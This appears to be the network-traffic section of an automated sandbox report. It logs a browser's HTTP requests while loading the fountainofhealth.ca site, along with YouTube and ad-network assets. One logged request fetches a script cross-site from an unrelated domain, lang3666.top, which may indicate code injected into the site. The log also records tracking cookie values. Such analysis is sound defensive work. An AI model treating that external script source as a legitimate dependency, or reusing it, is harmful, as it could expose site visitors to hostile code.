Source: global traffic HTTP traffic detected: GET /libraries/json2/json2.js?v=2 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/js/views_slideshow.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/remote.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3D
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /lv/index.php?CYI2UINI HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /instream/ad_status.js HTTP/1.1host: static.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
